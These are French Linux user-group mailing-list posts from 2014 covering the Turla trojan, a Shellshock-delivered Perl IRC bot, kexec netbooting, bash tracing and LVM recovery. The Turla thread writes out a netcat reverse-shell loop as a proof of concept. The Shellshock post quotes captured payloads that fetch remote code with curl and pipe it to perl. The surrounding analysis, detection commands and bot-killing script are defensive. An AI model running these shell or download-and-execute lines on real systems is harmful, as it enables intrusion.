 - le sniffing se fait sans plonger l'interface en mode promiscuous.
 - la connexion se faisant de l'intérieur vers un port 80 à l'extérieur,
   elle passera pour une simple connection ``surf''.

...

Le seul moyen d'afficher le pid de l'outil qui accède à /proc/net/tcp est
un truc du genre strace:

# strace -ffp $suspectPid 21| sed -une '/proc.*tcp/{p;q}'

Voilà... cela donne à réflechir!

-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Trojan Turla for Linux

[felix]

On Wed, Dec 17, 2014 at 03:45:05PM +0100, Daniel Cordey wrote:
 On mer, 2014-12-17 at 12:09 +0100, felix wrote:
 
  Sans chercher à affoler tous le monde...
 
 Faut quand meme reunir quelques conditions... non ? Ou bien j'ai loupe
 quelque chose ? Ce qui peut parfaitement ariver :-)

Ben, 'faut commencer par le laisser entrer, mais n'importe quelle faille
PHP ou autre permettant un ``remote exploit'' peut le faire.

$ while :;do netstat -n | grep -q $myfixedip:22 
  nc $myfixedip 80 -c /bin/bash ; done
 
 Et bibi n'ayant pas de port 22... 
Cela peut être 80, 1149, 25 ou autre... juste un port bindé normallement.
On s'en fiche, tant que $myfixedip n'a rien à priori à y faire...
(nb: $myfixedip est l'ip privée, fixe du pirate, ou une plage d'IP
 appartenant au pirate...)

dans une console:
$ nc -l -p 80
 
 Ouai, je listen... 
 
et dans une autre:
$ nc -w 3 $targethost 22

... et donc ``nc -w 3 $targethost 80, 1149, 25 ou autre...'' ;-)



 Et pourquoi ce timeout ?
Parce que cette connection ne sert que de ``knock door''. Pour déclancher
la suite du script, à savoir ``nc $myfixedip 80 -c /bin/sh''. Cette connection
est donc totallement bidon, elle doit juste durer plus d'une seconde (tiens,
j'ai oublié un ``sleep 1'' dans le shell, avant le ``done''.)


   - il n'a pas de port ouvert en listen.
 
 Oui, mais une connexion est etablie en TCP en sortie... non ? je peux
 donc la voir avec netstat... toujours non ?
Oui, si la connexion est établie, oui. Mais si personne n'est connecté, la
``knock-door'' est prête et fonctionnelle, mais reste invisible!

   - la connexion se faisant de l'intérieur vers un port 80 à l'extérieur,
 elle passera pour une simple connection ``surf''.

 Sur une machine qui n'a pas de browser... ca parait vite douteux... il
 me semble
Ok, c'est sûr que les virus ont de toutes façons peu de chance sur tes systèmes
(particuliers).

Mais dans le cas de serveurs web simples, des PHP qui font des requêtes http
ailleur, c'est courant.

Sans parler des systèmes de mises-à-jour automatiques pour CMS ou autre
produit susceptible d'être installé pas des webmasters...

-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Utiliser des logiciels KDE hors KDE

[felix]

Salut Marc,

On Mon, Dec 01, 2014 at 01:10:07AM +0100, Marc Mongenet wrote:
 Bonjour,
 
 Je commence à essayer d'utiliser des logiciels de KDE sur mon desktop
 principal, celui dont les fenêtres réagissent exactement comme je veux
 depuis 15 ans, et pas selon la mode du jour que je subis
 quotidiennement sur les autres Linux que j'utilise (il y aurait de
 quoi dire sur la descente dans le n'importe quoi du desktop Linux dans
 un autre message).
J'en déduis que tu n'utilises pas KDE, ni à priori Gnome 2 ou Gnome?

... donc pas D-Bus.

 A priori tout va bien, toutefois un petit message de log m'inquiète au
 lancement de certaines commandes :
 QDBusConnection: session D-Bus connection created before
 QCoreApplication. Application may misbehave.

J'ai trouvé:

http://qt.developpez.com/doc/4.7/qcoreapplication/#details

The QCoreApplication class provides an event loop for console
Qt applications.

...


The class provides a quit() slot and an aboutToQuit() signal.

 Je n'ai pas encore vu de dysfonctionnement. De quoi dois-je
 m'inquiéter concrètement ?

Donc, si j'ai bien compris, tu n'as aucun soucis à te faire:
Le seul risque est que certaines applications KDE aient du
mal à quitter et que tu te retrouves avec des zombies, et encore:

  ``This class is used by non-GUI applications to provide their event loop.
For non-GUI application that uses Qt, there should be exactly one
QCoreApplication object. For GUI applications, see QApplication.''

Si les applications KDE que tu utilises sont des GUI, tu ne devrais
rien avoir du tout à craindre...

De plus,
  http://qt-project.org/doc/qt-4.8/qdbusconnection.html
The QDBusConnection class represents a connection to the D-Bus bus daemon.

Ce message est généré par QDBusConnection qui devrait logiquement se terminer
lorsque tu quittes ton applic, ou au pire losque tu termines te session X.
Logiquement, à ce moment, les zombies qui sont resté croché dessus doivent
mourrir.

Voilà.

--
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] imap replication

[felix]

Bonjour,

Est-ce que quelqu'un par ici à déjà implémenté et exploité:

   cyrus-replication

Ma question porte sur la possibilité de ne répliquer qu'une partie du
serveur. Càd une dizaine de boite d'un serveur qui en compte une trentaine.

Question: Est-ce possible?

-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Shellshock et DDos irc bot perl...

[felix]

A toutes fins utiles, je poste ici, mon petit DDosIrcBotKiller.pl

On Mon, Oct 27, 2014 at 06:41:52PM +0100, felix wrote:

 Si ce sujet interesse, je peux organiser un petit workshop avec
 une présentation de ce script:
 
   DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team

 DDosIrcBotKiller.pl 
#!/usr/bin/perl

my @rps=(/usr/local/apache/bin/httpd -DSSL, /usr/sbin/httpd -k start -DSSL,
   /usr/sbin/httpd, /usr/sbin/sshd -i,/usr/sbin/sshd,/usr/sbin/sshd -D,
   /usr/sbin/apache2 -k start, /sbin/syslogd, /sbin/klogd -c 1 -x -x,
   /usr/sbin/acpid, /usr/sbin/cron);

opendir my $dh,/proc;
map {
open my $fh,/proc/.$_./cmdline;
my $cmdline=$fh;
close $fh;
if (grep { $cmdline eq $_ } @rps) {
printf Sending SIGKILL to process %d\n, $_;
kill 9, $_;
}; }
grep { readlink(/proc/.$_./exe) =~ m|/perl| }
grep { /^\d+$/ }
readdir $dh;
 DDosIrcBotKiller.pl 


-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Shellshock et DDos irc bot perl...

[felix]

Bonjour,

Tout d'abord, j'ai reçu un mail étrange (voire suspect;-). En effet,
tous les champs: ``To, References, Cc, From, Subject, Date, Message-ID,
Comments, Keywords, Resent-Date et Resent-From'' contiennent la même chose,
à savoir:

   () { :; }; /bin/sh -c 'cd /tmp ;curl -sO 178.254.x.x/ex.txt;lwp-do...

Bref, un petit malin aimerait que je télécharge un truc et que je le lance...
Malheureusement, le truc en question n'est plus disponible à l'adresse citée.

Bon.

Mais vendredi, j'ai trouvé dans les logs d'un de mes serveurs:

... [27/Oct/2014:05:40:56 +0100] GET /admin.cgi HTTP/1.0  403 2132 \
  () { :; }; curl http://202.143.x.x/lib21/index.cgi | perl \
  () { :; }; curl http://202.143.x.x/lib21/index.cgi | perl

Donc le user-agent et le referer contiennent la même chose...

Mais cette fois, je suis arrivé suffisament tôt pour le charger.

Après dé-obfuscation:

$ curl http://202.143.x.x/... | sed s/eval/print/ | perl  bot.pl

J'ai trouvé un ``outil'' intéressant. J'ai donc joué un peu avec afin de
comprendre autant que possible, les tenants et aboutissants.

En résumé et en l'état:

 - Le script n'est pas installé, par conséquent: il meurre si on reboot.
   Attention à ce qui peut être modifié avec le droits de l'utilisateur
   atteint, en particulier cron et at... Notez que si ``root'' est atteint
   ou si un moyen ``d'élévation de privilège'' existe, alors la machine
   devient **entièrement** suspecte.)
 - Il s'agit d'un ``irc bot'' qui se logge sur un serveur IRC pour
   executer ce qu'on pourra leur demander via ce channel IRC. Donc
   une connection TCP est ouverte lorsque le script fonctionne.
 - Il se masque autant que possible et prend une apparence différente
   à chaque execution.
 - Il se fork lui-même, afin de libérer la session qui l'a initié.
   (Il se désolidarise de son parent)

Pour le mettre en évidence:

 # ls -l /proc/*/exe | grep perl
 Listera les process utilisant perl sans tenir compte de la cmdline.

 # netstat -tanp | grep :8080
 Listera les process utilisant le port 8080. Si le port 8080 est
 utilisé du coté distant, alors c'est lui.
 Nota: le port 8080 est utilisé par CETTE implémentation de ce bot, mais
 n'importe quel autre port peut être utilisé. Cependant, codé dans le script,
 ce port est le même pour toute une ``génération'' de ce script.
  
 # ps --user www-data ho pid,ppid
 Un process www-data dont le parent pid est `1' est suspect.

 # top
 Le script n'est pas parfait, il a tendence à consommer bcp de cpu.

Etc...

En fait, il existe une pléthore de truc à faire, mais cela dépend de
l'environnement de la victime (serveur web, serveur mail, desktop...)

Si ce sujet interesse, je peux organiser un petit workshop avec
une présentation de ce script:

  DDoS Perl IrcBot v1.0 / 2012 by DDoS Security Team

-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] pxe sans pxe

[felix]

Y'aurait bien un truc:

$ apt-cache show kexec-tools
Description-en: tools to support fast kexec reboots
 This package provides tools to load a kernel into memory and then
 reboot directly into that kernel using the kexec system call,
 bypassing the normal boot process.

Qui te permettrait d'utiliser linux à la place de syslinux...


kexec -l /boot/vmlinux --append=... --initrd=/boot/initrd

kexec -e

A creuser (je n'ai encore jamais joué avec;) !


On Mon, Sep 08, 2014 at 04:39:55PM +0200, Cédric Briner wrote:
 
 Salut à tous,  
   
   
 Est-il possible de créer une clef usb qui puissent faire booter une machine 
 avec un tux, et de pouvoir faire une installation avec, sans que cette clef 
 contienne la configuration sylinux (ou autre). Je souhaite que la 
 configuration syslinux soit sur un serveur distant. Ainsi je pourrais 
 ajouter/supprimer/modifier des nouvelles images sans avoir à redistribuer les 
 images des clefs USB.  
   
 Je me suis dit, qu'il faudrait créer une sorte de syslinux avec un noyau 
 supportant le nfsroot.  
   
 Est-ce que l'un d'entre vous à une idée sur le sujet.  
   
 cED  
 P.-S. je ne peux pas faire de pxe car le serveur syslinux ne sera pas dans le 
 sous-réseau de broadcast.  
   
   
 

 ___
 gull mailing list
 gull@forum.linux-gull.ch
 http://forum.linux-gull.ch/mailman/listinfo/gull


-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
__
 Félix Hauri - Informaticien consultant  |\  /|   ___  _
 --  | \ __ / |  /-   /   o
 7, rue Centrale / CH-1450 Sainte-Croix  | .. | /_  ___  /
 Tél: (+41/0) 24 454 54 04  Fax:..54 00  |   /\   |/   /__/ /   /  \/
 http://www.f-hauri.ch   | \ __ / |   /   /__  /_  /_  /\
 email: fe...@f-hauri.ch  \  /   -
 Félix Hauri   -Informaticien consultant-   fe...@f-hauri.ch
 Tél: (+41/0) 24 454 54 04 - 079 703 15 36   -   http://www.f-hauri.ch
##  
 Ni PGP, ni cryptage:  Tant que mal maîtrisé et/ou mal installé ce sys-
 tème est entre inutile et dangereux. Attention! Il existe désormais des
 dispositions légales tendant à faire valoir à une signature électronique   
 le même poids qu'une signature manuscrite!
##

___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] pxe sans pxe

[felix]

A priori, ça le fait:

On Mon, Sep 08, 2014 at 05:36:47PM +0200, felix wrote:
 A creuser (je n'ai encore jamais joué avec;) !
Ça, c'est fait!

J'ai booté un kvm (qemu) avec ma clef ``debian-live'' (non-persistante).

Puis:

 $ uname -r
 3.2.0-4-686-pae

C'est ma clef debian live.

 $ sudo -s
 # apt-get update
 # apt-get install kexec-tools

 # nc -l -p  | tar -x
là, j'ai copié le ``debian netboot'' que je me garde à gauche, sur un autre 
serveur:
'$ tar -cplC /srv/tftp-i386 debian-installer-netboot | nc -q 0 192.168.1.36 
'

puis, regardé la ligne lancée par syslinux normalement via TFTP, ai adapté:

 # init 1
... 
 # kexec -l linux --initrd initrd.gz --append root=/dev/nfs \
nfs=/srv/nfsroot nfsaddrs=192.168.1.3
 # kexec -e

Après quelque secondes et reset de la carte graphique, je me retrouve dans
l'installeur debian. Par acquis de conscience, je lance une console shell:

 Go Back - Execute a shell

puis

 # uname -r
 2.6.32-5-486
(j'ai downgradé le kernel en cours)

Donc oui, ça semble bien le faire!

-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Truc et astuces: tracer bash suite: console secondaire

[felix]

Suite jouons avec une console secondaire (voire plus bas)...

On Fri, Jul 04, 2014 at 05:21:17PM +0200, felix wrote:
 Le script suivant peut être ``sourcé'' au début du script à tracer
 
   http://f-hauri.ch/vrac/elap-bash-v3

On peut égallement tester le script ``monscript.sh'' avec la syntaxe suivante:

$ bash -c '. elap-bash-v3;. monscript.sh'

Well, je vous laisse essayer (et analyser) le script que vous trouverez à

 http://f-hauri.ch/vrac/xterm/bash_tricks_for_so_sh

(A lancer avec ou sans l'argument ``nosleep'') 

Bon dimanche

-- 
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Les TTY de Unix

[felix]

Re,

On Sat, Jul 05, 2014 at 11:33:56PM +0200, Yves Martin wrote:
 Mais n'est-il pas temps de définir une nouvelle abstraction et
 implémentation from scratch pour ce concept afin de simplifier tout
 ça... X11 est moribond, Wayland et d'autres alternatives sonnent son
 glas. Alors pourquoi ne pas remplacer l'émulation de terminal série
 par un nouveau protocole de terminal texte tout beau tout neuf qui
 n'hériterait rien des aléas matériels de signaux transitant à vitesse
 d'escargot sur des fils de cuivre ?

Beaucoups ont essayé, aucun n'a franchement réussi,
Bonne chance!!

On ne change pas une équipe qui gagne!

Quand tu sais que c'est Jules César qui à dimensionné les réservoirs de la
navette spatiale, tu comprend la lourdeur des habitudes / standards établis.

(P.S. je viens de me créer un câble null-modem RS-232,
 comme quoi cela peut encore être utile.)

--
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

[gull] Truc et astuces: tracer un script bash (elap v3)

[felix]

Bonjour

Lors d'un cours shell, j'avais présenté ``elap-bash'', une fonction
permettant de tracer l'évolution d'un script bash en utilisant
/proc/timer_list pour afficher les temps en nano-secondes.

Après quelque échanges d'idées sur stackoverflow (recherchez `Times', sur:
  http://stackoverflow.com/a/20855353/1765658
), j'ai pondu une nouvelle version qui utilise fondamentalement:

 set -x

, après avoir re-dirigé le FD de ``set -x'' (BASH_XTRACEFD) vers

 | tee /tmp/sample-time.$$.log \
 | sed -u 's/^.*$/now/' \
 | date -f - +%s%N /tmp/sample-time.$$.tim

Càd UN seul fork et la command `date +%s%N' pour les nanosecondes 

Le script suivant peut être ``sourcé'' au début du script à tracer

  http://f-hauri.ch/vrac/elap-bash-v3

--
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull

Re: [gull] Récupération des données d'un disk raid par un port USB - problème avec LVM

[felix]

Bonjour,

On Thu, May 22, 2014 at 07:22:57AM +0200, Pierre Maitre wrote:
 2014-05-21 23:20 GMT+02:00 felix fe...@f-hauri.ch:
  Que donne:
 
lvs -v  | grep volume_1
Finding all logical volumes
  volume_1vg1 1 -wi-a- 927.00G   -1  -1  \
   253  2   1M3MIr-ihDz-CcVd-fOht-SqpF-fPgv-f0xiyO

J'avais bien lu: les major/minor sont 253/2!

grep  /proc/partitions '^ *253 *2 '
  2532  972025856 dm-2

Donc oui, le kernel semble bien voir 972mio de Kb.

blockdev --getsz /dev/vg1/volume_1
 1944051712

Confirmé: le kernel voit clairement 927Gib:

  v=000$[1000*1944051712/2048/1024]
  printf %.2fG\n ${v:0:${#v}-3}.${v:${#v}-3}
  927.00G

Donc, que se passe-t-il??? Que donnent:

 file -Ls /dev/vg1/volume_1

 ls -ld /mnt/usb

et encore:

 mount -o ro,noatime /dev/vg1/volume_1 /mnt/usb
 dmesg | tail -n 20

?

--
 Félix Hauri  -  fe...@f-hauri.ch  -  http://www.f-hauri.ch
___
gull mailing list
gull@forum.linux-gull.ch
http://forum.linux-gull.ch/mailman/listinfo/gull